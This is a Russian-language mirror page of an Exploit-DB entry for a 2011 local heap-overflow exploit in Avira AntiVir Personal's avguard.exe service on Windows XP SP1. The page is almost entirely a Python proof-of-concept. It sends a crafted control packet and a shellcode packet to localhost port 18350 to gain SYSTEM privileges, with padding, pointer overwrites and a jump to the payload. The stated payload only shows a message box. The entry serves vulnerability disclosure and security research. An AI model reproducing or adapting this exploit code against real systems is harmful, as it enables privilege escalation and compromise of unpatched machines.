- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 35226
- Проверка EDB
-
- Пройдено
- Автор
- D.ELSER
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2011-01-14
Код:
source: https://www.securityfocus.com/bid/45807/info
Avira AntiVir Personal is prone to multiple code-execution vulnerabilities.
Successful exploits may allow an attacker to execute arbitrary code with SYSTEM-level privileges. Failed exploit attempts will likely result in denial-of-service conditions.
Please note that these issues affect versions of the application that are no longer supported.
#
# Avira AntiVir personal edition avguard.exe 7.00.00.52 local heap overflow
# Proof of Concept (PoC) exploit / target: WinXP SP1
# bug discovered/exploit written by D.Elser
#
# by sending two simple TCP packets which will
# exploit a vulnerability in the Antivir guard
# service, the user will gain SYSTEM privileges
#
# this PoC code will cause the avguard service
# to show a messagebox within an infinite loop
from socket import *
import sys
# the first packet which is sent must
# contain a magic ID at offset 0x18
# and the length of the second packet
# to receive
#
# offset 0x18 : magic ID
# offset 0x1C : length of buffer for second packet
cpacket = "\x00\x00\x00\x00" \
"\x00\x00\x00\x00" \
"\x00\x00\x00\x00" \
"\x00\x00\x00\x00" \
"\x00\x00\x00\x00" \
"\x00\x00\x00\x00" \
"\x00\x00\x31\x06" \
"\x00\x00\x00\x40"
lyrics = "\x42\x72\x65\x61\x6B\x62\x65\x61\x74\x20\x45\x72\x61\x20\x2D\x20" \
"\x42\x75\x6C\x6C\x69\x74\x70\x72\x6F\x6F\x66\x0D\x0A\x0D\x0A\x45" \
"\x6C\x65\x63\x74\x72\x69\x66\x79\x20\x6D\x65\x20\x79\x6F\x75\x20" \
"\x6D\x79\x20\x68\x61\x6C\x66\x20\x62\x61\x6B\x65\x64\x20\x79\x6F" \
"\x75\x74\x68\x0D\x0A\x49\x20\x6D\x65\x6D\x6F\x72\x69\x73\x65\x20" \
"\x79\x6F\x75\x72\x20\x66\x61\x63\x65\x20\x73\x6F\x20\x49\x20\x77" \
"\x6F\x6E\x27\x74\x20\x66\x6F\x72\x67\x65\x74\x20\x79\x6F\x75\x0D" \
"\x0A\x44\x61\x6E\x63\x69\x6E\x67\x20\x64\x65\x6D\x6F\x6E\x73\x20" \
"\x69\x6E\x20\x74\x68\x65\x20\x66\x69\x72\x65\x6C\x69\x67\x68\x74" \
"\x20\x79\x65\x73\x20\x69\x74\x27\x73\x20\x74\x72\x75\x65\x0D\x0A" \
"\x52\x65\x6D\x69\x6E\x64\x20\x6D\x65\x20\x6F\x66\x20\x74\x68\x65" \
"\x20\x6E\x69\x67\x68\x74\x20\x49\x20\x66\x69\x72\x73\x74\x20\x6D" \
"\x65\x74\x20\x79\x6F\x75\x0D\x0A\x43\x72\x69\x74\x69\x63\x69\x73" \
"\x65\x20\x6D\x65\x20\x66\x6F\x72\x20\x6D\x79\x20\x6D\x69\x73\x2D" \
"\x73\x70\x65\x6E\x74\x20\x79\x6F\x75\x74\x68\x0D\x0A\x4E\x6F\x20" \
"\x74\x68\x72\x69\x6C\x6C\x20\x6E\x6F\x20\x6C\x69\x65\x20\x6D\x6F" \
"\x72\x65\x20\x63\x72\x61\x7A\x79\x20\x74\x68\x61\x6E\x20\x74\x68" \
"\x65\x20\x74\x72\x75\x74\x68\x0D\x0A\x59\x6F\x75\x20\x67\x69\x76" \
"\x65\x20\x6D\x65\x20\x70\x72\x65\x63\x69\x6F\x75\x73\x20\x74\x68" \
"\x69\x6E\x67\x73\x20\x49\x20\x74\x68\x72\x6F\x77\x20\x74\x68\x65" \
"\x6D\x20\x61\x6C\x6C\x20\x61\x77\x61\x79\x0D\x0A\x41\x6E\x64\x20" \
"\x6E\x6F\x77\x20\x79\x6F\x75\x20\x66\x72\x65\x65\x20\x6D\x79\x20" \
"\x62\x72\x65\x61\x74\x68\x20\x79\x6F\x75\x72\x20\x73\x63\x61\x72" \
"\x65\x64\x20\x77\x68\x61\x74\x20\x49\x20\x6D\x69\x67\x68\x74\x20" \
"\x73\x61\x79\x0D\x0A\x0D\x0A\x53\x70\x65\x61\x6B\x20\x6E\x6F\x20" \
"\x6C\x69\x65\x2C\x20\x49\x20\x74\x65\x6C\x6C\x20\x74\x68\x65\x20" \
"\x74\x72\x75\x74\x68\x0D\x0A\x53\x61\x76\x65\x20\x6D\x79\x20\x62" \
"\x72\x65\x61\x74\x68\x20\x79\x6F\x75\x20\x62\x72\x65\x61\x6B\x20" \
"\x74\x68\x65\x20\x72\x75\x6C\x65\x73\x0D\x0A\x54\x69\x6D\x65\x20" \
"\x77\x69\x6C\x6C\x20\x74\x65\x6C\x6C\x20\x79\x65\x61\x68\x20\x77" \
"\x68\x6F\x20\x69\x73\x20\x77\x68\x6F\x0D\x0A\x53\x69\x64\x65\x20" \
"\x62\x79\x20\x73\x69\x64\x65\x20\x77\x65\x27\x72\x65\x20\x62\x75" \
"\x6C\x6C\x69\x74\x70\x72\x6F\x6F\x66\x00"
# main part of shellcode
shellcode = "\x90\x8d\x46\x1b" \
"\x50\x05\x04\x00" \
"\x00\x00\x50\x05" \
"\x19\x00\x00\x00" \
"\x50\xb8\x2f\x71" \
"\x42\x00\xff\xd0" \
"\x90\xeb\xe5\x10" \
"\x20\x01\x00" \
"I got SYSTEM privileges!\x00" + lyrics
# fill shellcode up to a specific length
for i in range(0, 0x4000 - 0x20 - len(shellcode)):
shellcode = shellcode + "\x40"
# second part of shellcode which contains
# the pointers to be overwritten and code
# which jumps to main part of our shellcode
shellcode = shellcode + "\xEB\x0E\x90\x90" \
"\x90\x90\x90\x90" \
"\x52\xBF\x04\x78" \
"\xB4\x73\xED\x77" \
"\x8B\x57\x6C\x8B" \
"\xF2\x81\xEE\xE0" \
"\x3F\x00\x00\xFF" \
"\xE6\x90\x90\x90" \
"\x90\x90\x90\x90" \
"\x90\x90\x90\x90" \
s = socket(AF_INET,SOCK_STREAM)
s.settimeout(1)
s.connect(("127.0.0.1",18350))
print "Avira Antivir avguard.exe 7.00.00.52 local heap overflow.\n" \
"Exploit compatible with XP SP1.\n"
print "Sending control packet (size: 0x%x)" % (len(cpacket))
s.sendall(cpacket)
print "Sending shellcode packet (size: 0x%x)" % (len(shellcode))
s.sendall(shellcode)
print "avguard response:"
print s.recv(1024)
sys.exit()
- Источник
- www.exploit-db.com